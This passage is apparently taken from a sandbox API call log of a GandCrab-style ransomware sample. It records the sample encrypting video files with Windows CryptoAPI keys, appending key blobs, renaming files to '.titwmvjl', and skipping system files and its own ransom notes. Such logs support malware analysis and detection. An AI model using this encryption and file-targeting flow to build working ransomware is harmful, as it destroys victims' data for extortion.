hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503578) returned 1 [0095.642] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.642] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.642] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.642] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.643] GetLastError () returned 0x0 [0095.643] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.643] CryptDestroyKey (hKey=0x503578) returned 1 [0095.643] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.643] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.643] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.643] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.643] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x9238, lpOverlapped=0x0) returned 1 [0095.653] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffff6dc8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.653] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9238, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x9238, lpOverlapped=0x0) returned 1 [0095.656] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.656] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0095.657] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.660] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.661] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.661] CloseHandle (hObject=0x2d4) returned 1 [0095.661] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\61CNZp0_g.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\61cnzp0_g.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\61CNZp0_g.flv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\61cnzp0_g.flv.titwmvjl"), dwFlags=0x1) returned 1 [0095.662] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.662] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0095.662] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0095.662] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0095.662] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\d2ca4a09d2ca4deb61a.lock" [0095.662] lstrlenW (lpString=".titwmvjl") returned 9 [0095.662] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\d2ca4a09d2ca4deb61a.lock") returned 125 [0095.662] VirtualAlloc (lpAddress=0x0, dwSize=0x13a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.663] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 134 [0095.663] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\d2ca4a09d2ca4deb61a.lock") returned 125 [0095.663] lstrlenW (lpString=".lock") returned 5 [0095.663] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.663] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0095.663] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.663] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.663] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0095.663] lstrcmpW (lpString1="Gy7DNsp.mkv", lpString2=".") returned 1 [0095.663] lstrcmpW (lpString1="Gy7DNsp.mkv", lpString2="..") returned 1 [0095.663] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\", lpString2="Gy7DNsp.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\Gy7DNsp.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\Gy7DNsp.mkv" [0095.663] lstrlenW (lpString=".titwmvjl") returned 9 [0095.663] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\Gy7DNsp.mkv") returned 112 [0095.663] VirtualAlloc (lpAddress=0x0, dwSize=0x120, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.664] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\Gy7DNsp.mkv.titwmvjl") returned 121 [0095.664] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\Gy7DNsp.mkv") returned 112 [0095.664] lstrlenW (lpString=".mkv") returned 4 [0095.664] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.664] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mkv ") returned 5 [0095.664] lstrcmpiW (lpString1=".mkv", lpString2=".titwmvjl") returned -1 [0095.664] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.664] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\Gy7DNsp.mkv") returned 112 [0095.664] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\Gy7DNsp.mkv") returned 112 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="desktop.ini") returned 1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="autorun.inf") returned 1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="ntuser.dat") returned -1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="iconcache.db") returned -1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="bootsect.bak") returned 1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="boot.ini") returned 1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="ntuser.dat.log") returned -1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="thumbs.db") returned -1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="KRAB-DECRYPT.html") returned -1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="CRAB-DECRYPT.html") returned 1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="ntldr") returned -1 [0095.664] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="NTDETECT.COM") returned -1 [0095.665] lstrcmpiW (lpString1="Gy7DNsp.mkv", lpString2="Bootfont.bin") returned 1 [0095.665] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\Gy7DNsp.mkv") returned 112 [0095.665] lstrlenW (lpString=".mkv") returned 4 [0095.665] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.665] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mkv ") returned 5 [0095.665] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.665] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.665] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\Gy7DNsp.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\gy7dnsp.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0095.666] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.666] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0095.666] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.667] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.667] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.667] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.667] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.667] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0095.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.668] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.668] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.668] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.668] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.668] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.668] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.669] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.669] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0095.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.669] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.669] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.669] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.670] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5038f8) returned 1 [0095.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.670] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.670] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.670] GetLastError () returned 0x0 [0095.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.670] CryptDestroyKey (hKey=0x5038f8) returned 1 [0095.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.671] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.671] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.671] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.671] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.671] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503338) returned 1 [0095.671] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.671] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.671] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.672] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.672] GetLastError () returned 0x0 [0095.672] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.672] CryptDestroyKey (hKey=0x503338) returned 1 [0095.672] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.672] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.672] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.672] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.673] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x498e, lpOverlapped=0x0) returned 1 [0095.683] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffb672, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.683] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x498e, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x498e, lpOverlapped=0x0) returned 1 [0095.684] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.684] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0095.685] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.688] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.689] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.689] CloseHandle (hObject=0x2d4) returned 1 [0095.689] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\Gy7DNsp.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\gy7dnsp.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\Gy7DNsp.mkv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\gy7dnsp.mkv.titwmvjl"), dwFlags=0x1) returned 1 [0095.690] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.690] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0095.690] lstrcmpW (lpString1="hM005B.mp4", lpString2=".") returned 1 [0095.690] lstrcmpW (lpString1="hM005B.mp4", lpString2="..") returned 1 [0095.690] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\", lpString2="hM005B.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\hM005B.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\hM005B.mp4" [0095.690] lstrlenW (lpString=".titwmvjl") returned 9 [0095.690] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\hM005B.mp4") returned 111 [0095.690] VirtualAlloc (lpAddress=0x0, dwSize=0x11e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.691] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\hM005B.mp4.titwmvjl") returned 120 [0095.691] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\hM005B.mp4") returned 111 [0095.691] lstrlenW (lpString=".mp4") returned 4 [0095.691] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.691] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp4 ") returned 5 [0095.691] lstrcmpiW (lpString1=".mp4", lpString2=".titwmvjl") returned -1 [0095.691] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.691] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\hM005B.mp4") returned 111 [0095.691] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\hM005B.mp4") returned 111 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="desktop.ini") returned 1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="autorun.inf") returned 1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="ntuser.dat") returned -1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="iconcache.db") returned -1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="bootsect.bak") returned 1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="boot.ini") returned 1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="ntuser.dat.log") returned -1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="thumbs.db") returned -1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="KRAB-DECRYPT.html") returned -1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="CRAB-DECRYPT.html") returned 1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="ntldr") returned -1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="NTDETECT.COM") returned -1 [0095.691] lstrcmpiW (lpString1="hM005B.mp4", lpString2="Bootfont.bin") returned 1 [0095.691] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\hM005B.mp4") returned 111 [0095.691] lstrlenW (lpString=".mp4") returned 4 [0095.691] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.692] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0095.692] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.692] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.692] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\hM005B.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\hm005b.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0095.692] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.692] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0095.693] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.693] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.693] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.694] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.694] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.694] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.694] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0095.694] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.694] CryptReleaseContext (hProv=0x4c9980, 